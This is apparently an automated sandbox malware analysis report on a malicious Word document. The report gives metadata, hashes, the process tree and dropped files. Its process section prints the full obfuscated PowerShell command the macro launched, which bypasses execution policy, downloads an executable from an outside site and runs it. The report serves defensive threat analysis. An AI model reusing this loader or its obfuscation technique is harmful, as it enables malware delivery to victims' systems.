File name: e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e

Full analysis: https://app.any.run/tasks/03008759-02d7-454c-8611-acf7199b1cd8
Verdict: Malicious activity
Analysis date: July 18, 2019, 07:25:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Eduard Schuchhardt B.A., Number of Characters: 2331, Create Time/Date: Tue Oct 2 00:48:18 2018, Last Saved Time/Date: Tue Oct 2 00:48:18 2018, Security: 0, Keywords: voluptate, earum, enim, Last Saved By: Eduard Schuchhardt B.A., Revision Number: 181519, Subject: Dokument N892778, Template: Normal, Title: Dokument N892778, Total Editing Time: 02:00, Number of Words: 2331, Number of Pages: 64, Comments: Deserunt dolorem natus quae vel quia.
MD5: B3B1760D2E5525A562F2D7A49C27ED93
SHA1: 94BE3E9B653FF9C2DB2FEA0A3FFB5F02E533D77E
SHA256: E32940C52AED3B787267F4B8D528AF97108B46F5254578CBAAB20768D98F589E
SSDEEP: 3072:7AxB6T44CDZ803LyyK2CdWWDQKQ4k1aI2CyoPJf9J:7wN4Cl803eyK20WdKQ31vLyoPN9J

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Executable content was dropped or overwritten
      • WINWORD.EXE (PID: 2372)
    • Unusual execution from Microsoft Office
      • WINWORD.EXE (PID: 2372)
    • Application was dropped or rewritten from another process
      • VvoTw.exe (PID: 1784)
  • SUSPICIOUS
    • Reads the machine GUID from the registry
      • VvoTw.exe (PID: 1784)
  • INFO
    • Reads the machine GUID from the registry
      • WINWORD.EXE (PID: 2372)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 2372)
    • Dropped object may contain Bitcoin addresses
      • WINWORD.EXE (PID: 2372)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 2372)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (33.9)

EXIF

FlashPix

Category: sunt
Manager: Hertha Scholtz B.A.
Company: Junck Matthäi OHG mbH
Slides: -2147483648
Notes: -2147483648
Lines: 6422
HiddenSlides: -2147483648
Bytes: -2147483648
Paragraphs: 191
Comments: Deserunt dolorem natus quae vel quia.
Pages: 64
Words: 2331
TotalEditTime: 2.0 minutes
Title: Dokument N892778
Template: Normal
Subject: Dokument N892778
RevisionNumber: 181519
LastModifiedBy: Eduard Schuchhardt B.A.
Keywords: voluptate, earum, enim
Security: None
ModifyDate: 2018:10:01 23:48:18
CreateDate: 2018:10:01 23:48:18
Characters: 2331
Author: Eduard Schuchhardt B.A.
Software: Microsoft Office Word
CompObjUserType: Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: 39
No data.
All screenshots are available in the full report
Total processes: 35
Monitored processes: 2
Malicious processes: 1
Suspicious processes: 0

Behavior graph

winword.exe -> (drop and start) -> vvotw.exe

Process information

PID: 2372
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.5123.5000

PID: 1784
CMD: C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe $NUiEp='\ow';$SxAuE='Obj';$uoea='force';$oxeee='($e';$vktvli='.Net.W';$jbigseylw0='y + ';$XMUMZWE4='te -';$XOWTI='pass ';$ieffuo='(1)';$eujnrw5='://ww';$sqjzsjlo='Pol';$toui='om/wp';$iuhki='Fil';$DvwlNy=' Pro';$yzlursyw='Execu';$vhxkqtzjk='+ ''\yz';$aexny='stem';$qkjrow='rt-';$KeOoB='art-';$BxuPiij76=''',$pa';$xelz='nv:t';$cnuosq20='h;Remo';$EYSIU='.Dow';$oaehcu='var';$cwoiead76='hy =';$ielme='Sta';$wola='qhly''';$YUElsi='Proc';$zspsuor='$path=';$euiiorl68='esn';$FFQBUPABR='en/in';$cvykcpzwy='eak;}}';$tdkgbiwo=' Get';$oaxzoto='UForm';$oosdikmy='twent';$gtzcid='%s;';$jyveey='e'');(';$atgmjml11='d){br';$qifhdo='; St';$zkuoap='https';$ywoy='ect Sy';$ycgvtzzj='ypw.ex';$zfgabei41='ebc';$hekuk='lie';$pwuqyi0=';';$BjAtpWpb='$nhb';$OumXqq10='ess f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$uyue1='ge $h';$EOIOEU='te -';$yeokke6='Sleep';$tgszrqz35=' -m ';$dazfse='s; ';$ZvpDZkuu='emes/';$EPUJVH4='11.11';$aukeue='Get-Da';$ycsxtafm=' = ';$ilaeyfv='tem ';$kkothu67='urs';$eufejwy='c/file';$ieaee='nload';$noxqa='e(''';$uewtnqv='f($e';$qrcttykg='tco.c';$zgyghao4='yfifte';$IIoxta='emp+''';$avgqknlogc='ve-I';$jklcieo='rialpe';$EZLui='$nhbh';$kjnjv='temp ';$ozhnqi51='($env:';$kluyxdm61=') -rec';$ucmntu='u -';$UuixWPz='e -';$ortdi=' $hva';$wbarkee40='{ $eu';$iuke='ces';$ukselzjd='-con';$acvasle='th)';$bovzcrf0='at ';$REPUUO='at ';$ycgjbp='pat';$qkmccflw='UForm';$qmroaxh='-Scope';$imcix='[do';$hxedwra='Set-';$muozz='tion';$flourh8=';while';$psae='/th';$xqkiobs='rd = ';$kvzxuue6='nt)';$cxlqiai='uble]';$GaUKeu0='535;i';$YFEegck='w.impe';$yuongdb='.exe';$feywlof='-Da';$bnnpujs='New-';$ogyvr='tent';$uuao8='icy By';$lyuzvkta='%s;'; Invoke-Expression ($imcix+$cxlqiai+$BjAtpWpb+$cwoiead76+$tdkgbiwo+$feywlof+$EOIOEU+$oaxzoto+$bovzcrf0+$lyuzvkta+$ortdi+$xqkiobs+$EZLui+$jbigseylw0+$EPUJVH4+$flourh8+$ieffuo+$wbarkee40+$ycsxtafm+$aukeue+$XMUMZWE4+$qkmccflw+$REPUUO+$gtzcid+$ielme+$qkjrow+$yeokke6+$tgszrqz35+$GaUKeu0+$uewtnqv+$ucmntu+$uyue1+$oaehcu+$atgmjml11+$cvykcpzwy+$hxedwra+$yzlursyw+$muozz+$sqjzsjlo+$uuao8+$XOWTI+$qmroaxh+$DvwlNy+$iuke+$dazfse+$zspsuor+$oxeee+$xelz+$IIoxta+$NUiEp+$euiiorl68+$ycgvtzzj+$jyveey+$bnnpujs+$SxAuE+$ywoy+$aexny+$vktvli+$zfgabei41+$hekuk+$kvzxuue6+$EYSIU+$ieaee+$iuhki+$noxqa+$zkuoap+$eujnrw5+$YFEegck+$jklcieo+$qrcttykg+$toui+$ukselzjd+$ogyvr+$psae+$ZvpDZkuu+$oosdikmy+$zgyghao4+$FFQBUPABR+$eufejwy+$yuongdb+$BxuPiij76+$acvasle+$qifhdo+$KeOoB+$YUElsi+$OumXqq10+$ycgjbp+$cnuosq20+$avgqknlogc+$ilaeyfv+$ozhnqi51+$kjnjv+$vhxkqtzjk+$wola+$kluyxdm61+$kkothu67+$UuixWPz+$uoea+$pwuqyi0);
Path: C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 975
Read events: 871
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 13
Suspicious files: 0
Text files: 123
Unknown types: 3

Dropped files

PID: 2372 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVRACCD.tmp.cvr
Type:
MD5:
SHA256:

PID: 2372 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
Type: text
MD5: C602DFE9823E722F2F602F33A37CBB13
SHA256: B9F85015219CA33C2616875F9802DCEDE0301FBD50F4336F285FCB9712451DE2

PID: 2372 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll
Type: executable
MD5: 54EFE3C64894D8001451CFCADF9C0F3C
SHA256: 52FBDDD19233ECC3F43CE229F6EA525C6775F435445E4811421195C40F8F569D

PID: 2372 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc.LNK
Type: lnk
MD5: 1646F6F20D0CFC75416A644F97532017
SHA256: B32EBC7D5CF76DF0C0A167BEE162B7523FC4CF2FDDF30744486C5869F2072E60

PID: 2372 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Diagnostics.Format.ps1xml
Type: text
MD5: FF6EEB8125B9265C5BA40AF9F7C6F6BC
SHA256: 7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689

PID: 2372 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\DotNetTypes.format.ps1xml
Type: xml
MD5: 1AB2FD4B6749AD6831C86411FDCAFB48
SHA256: 98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF

PID: 2372 | Process: WINWORD.EXE
Filename: C:\Users\admin\Desktop\~$2940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc
Type: pgc
MD5: ADEB6243CB5FAD24CF9D150EC6AA3E0D
SHA256: 0B567364B7EA4A3E8846D6D723ECE32DD8D14C1CF9893AF84900686D538FF0FB

PID: 2372 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Certificate.format.ps1xml
Type: xml
MD5: C93A361112351B30E2C959E72789952D
SHA256: 4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D

PID: 2372 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Command_Syntax.help.txt
Type: text
MD5: 847B0C3A6010660492ECC1D88A69210D
SHA256: 7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B

PID: 2372 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Comparison_Operators.help.txt
Type: text
MD5: 409ED6BE5314BAC97AFC88ACA11725A8
SHA256: 613EBA45D12113B49D942FF9CFC939F0F5C8CABB819B5B3BD47B7A4F9E719D48
HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 0
Threats: 0

HTTP requests

No HTTP requests

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info